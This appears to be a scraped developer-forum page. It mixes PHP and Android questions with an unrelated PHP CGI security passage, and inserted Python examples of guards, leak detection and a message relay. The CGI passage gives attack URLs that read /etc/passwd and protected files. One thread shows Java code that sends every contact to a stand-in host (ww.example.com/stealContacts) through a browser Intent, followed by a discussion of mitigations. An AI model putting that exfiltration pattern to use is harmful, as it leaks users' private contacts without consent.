PHP is it possible? - Frameworks

Hi experts,
I am a reasonably good PHP scripter, but know just the very, very basics of mobile app development (Java/Smali/Android Studio).
I really have no interest in trying to learn enough to build a decent app as time is a big limiting factor for me.
I have an idea for an app, and I know I could do the whole thing in PHP quite easily, but I would like it to be a downloadable app. Is it possible to write my software in PHP and then have a very basic Android/iOS app that basically just loads the website? The only thing the app needs to do is run the web pages in fullscreen and hide any browser elements (URL bar, scroll bar etc.). The only thing that may be challenging is enabling "swipe" abilities, but I can live without that and just use hyperlinks for moving around. I would also look at preloading content so the app runs smoothly. At some point, if the app gets any interest, I would pay to get it developed properly.
Keen to hear your thoughts - maybe there are other apps already doing this that I can copy. I know some may say why not just make it browser based, but I believe the app store itself is the critical part of advertising and exposure for this service; it also means I can release a real app version in the future and have it pushed to all devices.

Possible attacks

Using PHP as a CGI binary is an option for setups that for some reason do not wish to integrate PHP as a module into the server software (such as Apache), or that will use PHP with various kinds of CGI wrappers to create safe chroot and setuid environments for scripts. This setup usually involves installing the executable PHP binary into the web server's cgi-bin directory. CERT advisory CA-96.11 recommends against placing any interpreters into cgi-bin. Even though the PHP binary can be used as a standalone interpreter, PHP is designed to prevent the attacks this setup makes possible:
Accessing system files: http://my.host/cgi-bin/php?/etc/passwd
The query information in a URL after the question mark (?) is passed as command line arguments to the interpreter by the CGI interface. Interpreters usually open and execute the file given as the first argument on the command line. When invoked as a CGI binary, PHP refuses to interpret the command line arguments.
Accessing any web document on the server: http://my.host/cgi-bin/php/secret/doc.html
The path information part of the URL after the PHP binary name, /secret/doc.html, is conventionally used to name the file that the CGI program should open and interpret. Usually some web server configuration directives (Apache: Action) are used to redirect requests for documents like http://my.host/secret/script.php to the PHP interpreter. With this setup, the web server first checks the access permissions on the directory /secret, and then creates the redirected request http://my.host/cgi-bin/php/secret/script.php. Unfortunately, if the request is originally given in this form, the web server performs no access check for the file /secret/script.php, only for the /cgi-bin/php file. Thus any user able to access /cgi-bin/php can access any protected document on the web server. In PHP, the runtime configuration directives cgi.force_redirect, doc_root and user_dir can be used to prevent this attack if the server document tree has any directories with access restrictions.
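The following is an added example, not PHP's source and not part of the original text: a Python model of the two guards named above, cgi.force_redirect and doc_root, applied to the three request shapes in the text. The facts it relies on are real CGI/Apache behaviour (a query string without "=" is passed to the program as argv, PATH_INFO carries the path after the binary name, and Apache sets REDIRECT_STATUS when an Action/handler redirects a request to the CGI). The document root /var/www/html and the sample environments are constructed for the example.

```python
"""Model of PHP CGI's cgi.force_redirect and doc_root guards (illustration,
not PHP's own code). Sample environments below are constructed."""
import posixpath
from typing import Dict, Optional


def force_redirect_ok(env: Dict[str, str], force_redirect: bool = True,
                      redirect_status_env: str = "REDIRECT_STATUS") -> bool:
    """cgi.force_redirect=1: run only when the web server itself redirected the
    request to us. Apache signals that with REDIRECT_STATUS; a direct hit on
    /cgi-bin/php/... carries no such variable. cgi.redirect_status_env names
    another variable for servers that use one."""
    return (not force_redirect) or (redirect_status_env in env)


def resolve_script(doc_root: str, path_info: str) -> Optional[str]:
    """doc_root: map PATH_INFO onto the document root and refuse any path that
    normalises to a location outside it (e.g. '/../../etc/passwd')."""
    if not path_info.startswith("/"):
        return None
    root = posixpath.normpath(doc_root)
    prefix = root if root.endswith("/") else root + "/"
    target = posixpath.normpath(posixpath.join(root, path_info.lstrip("/")))
    if target != root and not target.startswith(prefix):
        return None
    return target


def decide(env: Dict[str, str], doc_root: str = "/var/www/html",
           force_redirect: bool = True) -> str:
    """Say what the CGI binary does with one request."""
    # Gate 1: refuse requests the server did not redirect to us.
    if not force_redirect_ok(env, force_redirect):
        return "refused: cgi.force_redirect requires a server redirect"
    path_info = env.get("PATH_INFO", "")
    # Gate 2: /cgi-bin/php?/etc/passwd arrives as argv (QUERY_STRING without
    # '='); the CGI binary never treats argv as a script to run.
    if not path_info:
        return "nothing run: command line arguments are ignored"
    # Gate 3: confine the script to doc_root.
    script = resolve_script(doc_root, path_info)
    if script is None:
        return "refused: PATH_INFO escapes doc_root"
    return "run " + script


if __name__ == "__main__":
    samples = {
        "/cgi-bin/php?/etc/passwd (direct)": {"QUERY_STRING": "/etc/passwd"},
        "/cgi-bin/php/secret/doc.html (direct)": {"PATH_INFO": "/secret/doc.html"},
        "/secret/script.php (via Action)": {"PATH_INFO": "/secret/script.php",
                                            "REDIRECT_STATUS": "200"},
    }
    for name, env in samples.items():
        print(f"{name:42} -> {decide(env)}")
```

In real deployments the redirect is what Apache's `Action application/x-httpd-php /cgi-bin/php` produces, and `cgi.force_redirect = 1` (PHP's default) is what makes the binary insist on it; the model above shows why the direct /cgi-bin/php/secret/doc.html form is refused while the redirected form runs.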

Related

PHP Calendar Question

I'm in the process of redesigning our local access station's web site. I'm just about finished, except for a program guide system. Currently, the "program schedule" page is simple HTML, but there are a number of problems with this system.
First off, the person who updates the schedule is by no means a web designer, and the page slowly deteriorates as tweaks are accidentally made while updating.
Secondly, the new site is designed to show the current day's program schedule on each page. It would obviously be a royal pain to update this manually using HTML, so we're looking for some sort of PHP calendar system to integrate into the site.
What we need is a simple PHP/MySQL calendar system that will allow us to integrate a daily schedule into a sidebar, and set up a program grid on the main schedule page.
As in the above example, we'd like the program name to link to that show's page.
I've looked around for a few days trying to find a good system, but haven't had much luck. I don't know if there are any PHP "program guide" scripts out there, but I would think there would be some sort of calendar that could accomplish this job.
I should note I know a little bit of PHP/MySQL scripting - enough to do some *minor* tweaking to a simple script, but I'm by no means fluent with it. Bottom line- the less scripting I have to do, the better.
The current version of the site can be viewed here. (We haven't transferred our domain to the new server yet, hence the subdirectory setup.) The weather sidebar is a placeholder for the program schedule. I appreciate any suggestions or advice, so thanks in advance to anyone who can point me in the right direction!

A new App for web-tinkerers (Open Source)

I don't participate much, but I've learned a great deal from this site. So I'm posting this here as GPL2 software as a way of thanking everyone. All I really ask is that it not be used in a closed-source app without talking to me first.
Can't poast URLs, because I have fewer than 10 poasts (I lurk hard). Mod, if you don't deem this to be spam, would you kindly provide the link (or allow me to do so)?
[sourceForge.net]/projects/webremote/
Basically, this was meant to be a generalized HTTP(S) client, with the URLs being assembled dynamically and under a variety of different circumstances. The server-end of the transaction is a creation of the user.
I wrote this tool to assist me with repetitive tasks at work (specifically, Asterisk/Linux administration). I wrote a PHP page to do things like add users, check server load, trigger recordings and dialplan modes, and so forth.
I have also used it in conjunction with a Raspberry Pi to trigger relays and read sensors in my home from wherever I happen to be at that moment.
There are lots of things I want to do with this app...
Implement GPS, so I can trigger URLs at waypoints.
Tie into NFC and make a bitcoin wallet that you can "bump" or scan a QR code to pay someone.
Implement Trigger packages to support one-click importing of Triggers for a specific task (i.e., Minecraft server administration)
Use BouncyCastle to encrypt the DB.
Hook into the camera and fire triggers using snapshots (or image files) as arguments.
Actually cause the HTTPS Receivers to validate certificates. Presently it does not (although the traffic is still encrypted).
I will take requests, questions, and bug reports at the SourceForge page, but how fast things get done will directly correlate to how much interest the project attracts (which may very well be none).
For those learning how to program and trying to learn something by reading the source, I'm sorry.
I've tried to keep things hygienic. I come from a C/Java background, so Android was a bit of a leap with respect to its organization. This program is a work of evolution.
To check out the source, use subversion:
svn checkout svn://svn.code.sf.net/p/webremote/code/trunk webremote
My working copy is also my Eclipse directory, so importing it with Eclipse should be minimal trouble.
If anyone *really* wants to thank me, I am a bitcoin user:
12rA36FH4NUFZojxyxQgWmQm6WUnzfQ1yR
Or you could buy the version I have up at google play (but I consider this a donation):
Can't poast URLs.... Search the Play store for WebRemote.
Thank you all again for sharing your knowledge.

Intent mechanism and security

Hi all,
I have a question to share with you about the Intent mechanism and I hope to start an interesting discussion.
As you (may) know, through the use of an "Intent" an app can send data to another app, or request an operation to be performed. For example, from my app I can send an Intent to the browser app in order to open a specific URL. But the Intent mechanism seems (correct me if I am wrong) not to apply any security mechanism. Suppose I want to steal the contacts from a device and send them to a web server; to perform these two operations I would need the following permissions:
Code:
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.INTERNET"/>
the former to read the contacts and the latter to send the data to the web server, but this is not true. In fact, I developed a simple app (named myApp) with the following permission:
Code:
<uses-permission android:name="android.permission.READ_CONTACTS"/>
Basically myApp reads the contacts (it holds the permission) and builds a string like the following:
Code:
// contacts: a Map<String, String> of name -> number read under READ_CONTACTS (assumed here); each entry becomes one URL-encoded name=number parameter
String request = "http://ww.example.com/stealContacts?";
for (Map.Entry<String, String> c : contacts.entrySet())
    request += URLEncoder.encode(c.getKey(), "UTF-8") + "=" + URLEncoder.encode(c.getValue(), "UTF-8") + "&";
Finally, I put the request in the intent (see below); this means that I want to perform a GET request to the web app http://ww.example.com/stealContacts and send all the contacts with their phone numbers as parameters.
Code:
// The app that handles ACTION_VIEW (the browser) makes the GET with its own INTERNET permission
Intent i = new Intent(Intent.ACTION_VIEW);
i.setData(Uri.parse(request));
startActivity(i);
In order to test this, I developed a web app that, when triggered, saves all the parameters in the request and shows an advertising page.
From my point of view this is very strange, because I can steal the contacts easily.
What do you think? Is it a security breach?
You have the permission to read contacts and use the internet. You read the contacts and uploaded them to the internet. I don't see any exploit here, besides unethical behavior.
Hi iBotPeaches, thank you for joining the discussion.
I don't give myApp the permission to use the internet; I only give it READ_CONTACTS, but through the Intent I can send the contacts to the internet. I cannot directly open an HTTP connection in myApp.
Yes, this is a fairly well "known" attack - you can use the web browser intent to "leak" information via GET variables.
I am not certain it's a "breach" in the true sense, since Android seems to be an over-trusting platform. I suggest taking a look at XPrivacy on XDA, since its "view" permission for websites will prevent this attack from working unless the user chooses to trust the app (by default it doesn't trust anything).
This is not a security break. You can only use the permissions you gave. It's almost impossible to gain permissions without declaring them. There is a GPS exploit around which enables GPS without permissions and user confirmation, but I think it's fixed in Android 3.0+.
I second the XPrivacy recommendation and would add OpenPDroid. Both allow you to prevent apps from launching URLs in native Android Browser. XPrivacy allows you to choose which of your accounts and which of your contacts (if any) to allow apps to access.
@simone.mutti - you may be the perfect candidate for this given your interest and ability to develop Android apps:
What the community really needs is a "proof of concept" app that requests all permissions necessary to display all identifying data available/entrusted to Android core services. The app would request the absolute minimum permissions needed to access every bit of data "protected" (aka denied) or "obscured" (aka falsified) by things like XPrivacy and OpenPDroid.
The purpose of the app would be twofold:
1) allow users to verify the effectiveness of privacy apps. Currently, XPrivacy's developer recommends NetInfo 2 for the purposes of verifying the efficacy of his app's different privacy features. But the picture is incomplete as NI2 wasn't developed for this purpose.
2) demonstrate the ease with which users can unwittingly supply an app with an inordinate amount of identifying data with the tap of the "install" button. This would serve a similar benefit as pen testing tools by highlighting to non-developers (aka lay people) the various pitfalls of the current Android framework. The most excellent, poignant finishing touch would be to allow it to read all intents/permissions of installed Android apps and present the various data each app is allowed to access + the various methods through which it could "legitimately" send that data to some undeclared outside server with/without encryption. Not the easiest task but certainly transformative in terms of cluing casual users into the true cost of their "free" and paid apps.
Check out the latest flavor of Angry Birds for a poster-perfect example of data sucking apps at their worst.
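The following is an added example, not code from any poster in this thread: what the ACTION_VIEW leak discussed above looks like from the network side, and a detector for it. The app itself never opens a socket; the browser fetches the URL under its own INTERNET permission, so the contacts travel as GET parameters and a proxy or web-server log shows one long GET with many phone-number-shaped values. The log lines below are constructed for this example, and the field layout (timestamp, client, method, URL) is an assumption; only the URL and hostname from the thread are reused.

```python
"""Detecting contact exfiltration via a browser intent in request logs.
Illustration only; the sample log is constructed, not captured traffic."""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed log: one line per request, "<ts> <client> <method> <url>"
SAMPLE_LOG = """\
2014-03-01T10:00:01 10.0.0.7 GET http://ww.example.com/stealContacts?Alice=%2B1-555-0100&Bob=555-0101&Carol=%28555%29+0102&Dave=5550103
2014-03-01T10:00:02 10.0.0.7 GET http://www.example.org/news?page=2&sort=date
2014-03-01T10:00:03 10.0.0.9 GET http://www.example.org/search?q=555+main+street
"""

_PHONE_DIGITS = re.compile(r"^\+?\d{7,15}$")


def looks_like_phone(value: str) -> bool:
    """Heuristic: after removing separators, 7-15 digits with optional '+'."""
    stripped = re.sub(r"[\s\-().]", "", value)
    return bool(_PHONE_DIGITS.match(stripped))


def score_query(url: str) -> tuple:
    """Return (phone-shaped query values, total query parameters, URL length)."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    phones = sum(1 for _, v in params if looks_like_phone(v))
    return phones, len(params), len(url)


def flag_exfil(log_text: str, min_phones: int = 3) -> list:
    """Return URLs of GET requests whose query string carries at least
    min_phones phone-shaped values: the signature of contacts leaked through
    a browser intent, as in the thread above. Ordinary pages (a page number,
    a search for a street address) do not reach the threshold."""
    flagged = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[2] != "GET":
            continue
        url = parts[3]
        phones, _, _ = score_query(url)
        if phones >= min_phones:
            flagged.append(url)
    return flagged


if __name__ == "__main__":
    for url in flag_exfil(SAMPLE_LOG):
        print("possible contact exfiltration:", url)
```

The threshold is a trade-off: a single phone-shaped value is common in legitimate forms, while several in one GET from a client that just launched a browser intent is worth an alert; on a real proxy the URL length and the unusual host are additional signals.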

[Q] App development help?

I want to develop a very basic app.
Main function: Show the value of a cryptocurrency
My problem: I don't know how to get the value of this cryptocurrency from this website and put it in my app. I want it so that every time I push the refresh button it gets the newly updated value and prints it on the screen.
Hi,
To get values from a website, you can use a technique called screen scraping. To do that you can use Jsoup. A very good starting point is to search for "Jsoup HTML Parser Hello World Examples" and check the mkyoung examples (I can not post links yet).
In order to examine the html you can use a web inspector like Firebug.
Jsoup is a nice library especially since it can handle fetching the document for you (not always desirable though) and has a familiar jQuery-like syntax. I've used it in projects before and it's pretty quick to get going with.

Android to PC text based communication

Hi!
(Disclaimer: I do not have a degree in CS or SE yet, and my knowledge stems from high school and some freelance work. I have coded a few programs and an app before, though I might have some methods / ideas that would look horrible to you. If such is the case - please tell me! I am still learning and might sometimes go a certain route which works but is completely "wrong" regarding coding standards. (For instance: I have a note taking app which saves its content in a text file, which I am pretty sure is not how any other app works)).
My question:
I am in the process of coding an Android app, which needs, as a part of the service it provides, to send certain messages (text only) to the app user's PC (one way).
I would like to use some sort of central service, since in my understanding of routers and IP I'd have to have the user set up port forwarding if his PC is behind a router (which would be complicated for most users). (If this is untrue and using an IP based solution would be better/simpler then please explain how so.)
The first solution I have devised (which I would very much like to avoid) is to use a third party service (such as Pushbullet) as a means to transfer the messages without paying for any services myself. This is less convenient since (to my understanding) I'd have to name the app "X for Pushbullet" and might have some legal trouble, and I would also be dependent on a third party.
The second solution I've thought of would be to host (as in pay monthly for hosting on a server) an online DB with usernames and messages (the message table containing a column for which user sent the message as well), and a local program (written in C# or Python probably) on the target PCs which searches the DB every X interval for new messages for username X. This seems like it would work, though it probably isn't the most graceful way to go about it.
Would really like to hear how a more experienced programmer would tackle this problem!
Thanks a lot in advance!
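The following is an added example, not the poster's design and not any real service: a minimal in-memory model of the "hosted database plus polling client" option described in the post, in Python so it runs offline. The phone side calls send(); the PC side calls poll() with the id of the last message it has seen. Two details a practitioner would add to that design are shown: both sides authenticate with a per-user token (compared in constant time), so one user's PC cannot read another user's messages, and the cursor makes repeated polls idempotent. The user names, token scheme and message layout are assumptions for this example.

```python
"""Polling message relay: phone sends, PC polls, per-user tokens and a
cursor. Illustration only; users and messages below are constructed."""
import hmac
import secrets
from typing import Dict, List, Tuple


class Relay:
    """Server side: the two tables a hosted DB would hold (users, messages)."""

    def __init__(self):
        self._tokens: Dict[str, str] = {}                 # user -> secret token
        self._messages: List[Tuple[int, str, str]] = []   # (id, user, text)

    def register(self, user: str) -> str:
        """Create a user and return the token both the app and the PC
        program must present on every call."""
        if user in self._tokens:
            raise ValueError("user exists")
        token = secrets.token_urlsafe(32)
        self._tokens[user] = token
        return token

    def _check(self, user: str, token: str) -> None:
        expected = self._tokens.get(user)
        # constant-time compare: a wrong token is not distinguishable by timing
        if expected is None or not hmac.compare_digest(expected, token):
            raise PermissionError("bad user or token")

    def send(self, user: str, token: str, text: str) -> int:
        """Phone -> server: store a message for this user, return its id."""
        self._check(user, token)
        msg_id = len(self._messages) + 1
        self._messages.append((msg_id, user, text))
        return msg_id

    def poll(self, user: str, token: str, since_id: int) -> Tuple[List[str], int]:
        """PC -> server: this user's messages with id > since_id, plus the new
        cursor. The client stores the cursor and sends it next time, so an
        overlapping or repeated poll never re-delivers a message."""
        self._check(user, token)
        new = [(i, t) for i, u, t in self._messages if u == user and i > since_id]
        cursor = new[-1][0] if new else since_id
        return [t for _, t in new], cursor


class PcClient:
    """Client side: what the program on the PC does every X seconds."""

    def __init__(self, relay: Relay, user: str, token: str):
        self.relay, self.user, self.token = relay, user, token
        self.cursor = 0
        self.received: List[str] = []

    def tick(self) -> List[str]:
        texts, self.cursor = self.relay.poll(self.user, self.token, self.cursor)
        self.received.extend(texts)
        return texts


def demo() -> Tuple[List[str], bool]:
    """Two users: alice's PC receives only alice's messages, repeated polls
    deliver nothing twice, and bob's token cannot read alice's queue.
    Returns (what alice's PC received, whether bob was refused)."""
    relay = Relay()
    tok_a, tok_b = relay.register("alice"), relay.register("bob")
    pc = PcClient(relay, "alice", tok_a)
    relay.send("alice", tok_a, "build finished")
    relay.send("bob", tok_b, "bob's note")
    pc.tick()
    relay.send("alice", tok_a, "disk 90% full")
    pc.tick()
    pc.tick()  # nothing new: the cursor prevents re-delivery
    try:
        relay.poll("alice", tok_b, 0)
        refused = False
    except PermissionError:
        refused = True
    return pc.received, refused


if __name__ == "__main__":
    print(demo())
```

In a hosted version the Relay methods become HTTPS endpoints and the token is sent in a header; the polling interval then trades latency against server load, which is the main reason a push channel is usually preferred once the service grows.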
